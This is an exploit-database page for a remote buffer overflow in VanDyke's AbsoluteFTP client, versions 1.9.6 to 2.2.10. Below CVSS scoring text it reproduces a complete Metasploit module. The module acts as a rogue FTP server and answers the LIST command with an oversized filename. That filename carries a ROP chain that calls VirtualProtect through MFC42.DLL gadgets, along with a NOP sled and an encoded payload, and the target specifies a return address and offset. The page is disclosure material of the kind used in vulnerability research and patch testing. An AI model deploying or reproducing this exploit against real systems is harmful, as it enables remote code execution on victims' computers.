Exploitalert - Database of Exploits

AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)

CVE	Category	Price	Severity
N/A	CWE-119	N/A	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2012-09-23

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H	0.45	0.85

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

http://cxsecurity.com/ascii/WLB-2012090154

# Exploit Title: AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST) # Date: 2011-11-09 # Author: Node # Software Link: http://www.vandyke.com/pub/AbsoluteFTP/aftp2210.exe # Version: 1.9.6 - 2.2.10 # Tested on: Windows XP SP3, Windows 7 SP1 # CVE : - # Exploit has been tested to work on: # AbsoluteFTP 2.2.10 (build 252) # AbsoluteFTP 2.2.9 (build 248) # AbsoluteFTP 2.2.8 (build 241) # AbsoluteFTP 2.2.7 (build 238) # AbsoluteFTP 2.2.6 (build 230) # AbsoluteFTP 2.2.5 (build 225) # AbsoluteFTP 2.2.4 (build 216) # AbsoluteFTP 2.2.3 (build 210) # AbsoluteFTP 2.2.2 (build 203) # AbsoluteFTP 2.2 (build 197) # AbsoluteFTP 2.2 (build 291) # AbsoluteFTP 2.2B3 (build 163) # AbsoluteFTP 2.2B2 (build 158) # AbsoluteFTP 2.2B1 (build 144) # AbsoluteFTP 2.0.5 (build 297) # AbsoluteFTP 2.0.4 (build 293) # AbsoluteFTP 2.0.3 (build 289) # AbsoluteFTP 1.9.6 # Does not work on: # AbsoluteFTP 1.8 ## # $Id: $ # Skeleton generated by mona.py - Corelan Team ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer def initialize(info = {}) super(update_info(info, 'Name'=> 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)', 'Description'=> %q{ This module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. }, 'License'=> MSF_LICENSE, 'Author'=> [ 'Node',# Original discovery, MSF module, ROP code ], 'Version'=> '$Revision:$', 'References'=> [ [ 'OSVDB', '---' ], [ 'CVE', '---' ], [ 'URL', '---' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0d\x5c\x2f\x0a", }, 'Targets'=> [ [ 'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252', { 'Ret' =>0x5f479005, 'Offset'=>3336 } ], ], 'Privileged'=> false, 'DisclosureDate'=> 'MONTH DAY YEAR', 'DefaultTarget'=> 0)) end #copypasted from ScriptFTP exploit def on_client_unknown_command(c,cmd,arg) c.put("200 OK\r\n") end def on_client_command_list(c,arg) conn = establish_data_connection(c) if(not conn) c.put("425 Can't build data connection\r\n") return end print_status(" - Data connection set up") code = 150 c.put("#{code} Here comes the directory listing.\r\n") code = 226 c.put("#{code} Directory send ok.\r\n") rop_gadgets = [ 0x5f46a206,# POP EAX # RETN (MFC42.DLL) 0x5f49b260,# <- *&VirtualProtect() 0x5f413fa0,# MOV EAX,DWORD PTR DS:[EAX] # RETN 04 ** [MFC42.DLL] 0x5f418d93,# PUSH EAX # ADD AL,5F # POP ESI # POP EBX # RETN ** [MFC42.DLL] 0x90909090,# NOPS (RETN 4) 0x90909090,# NOPS (-> ebx) 0x5f432001,# POP EBP # RETN (MFC42.DLL) 0x5F4774D5,# ptr to 'jmp esp' (from MFC42.DLL) 0x5f46a206,# POP EAX # RETN (MFC42.DLL) 0xfffffdff,# value to negate, target value : 0x00000201, target reg : ebx #<--ADJUST ME FOR BIGGER PAYLOAD 0x5f46f6dd,# NEG EAX # RETN (MFC42.DLL) 0x5f47909a,# XCHG EAX,EBX # DEC EDX # POP EDI # RETN (MFC42.DLL) 0x90909090,# NOPS (-> edi) 0x5f498456,# POP ECX # RETN (MFC42.DLL) 0x5F4D1115,# RW pointer (lpOldProtect) (-> ecx) !!! 0x5f46a206,# POP EAX # RETN (MFC42.DLL) 0xffffffc0,# value to negate, target value : 0x00000040, target reg : edx 0x5f46f6dd,# NEG EAX # RETN (MFC42.DLL) 0x5f4892df,# XCHG EAX,EDX # DEC EAX # POP EDI # RETN (MFC42.DLL) 0x5f479005,# ROP NOP (-> edi) 0x5f46a206,# POP EAX # RETN (MFC42.DLL) 0x90909090,# NOPS (-> eax) 0x5f4755b8,# PUSHAD # RETN (MFC42.DLL) ].pack("V*") buffer = [0x5f479005].pack("V*")*848 #ROP NOP's buffer << rop_gadgets buffer << "\x90"*30 buffer << payload.encoded #copypasted from ScriptFTP exploit print_status(" - Sending directory list via data connection") dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n" dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n" dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n" conn.put(dirlist) conn.close return end end

Impressum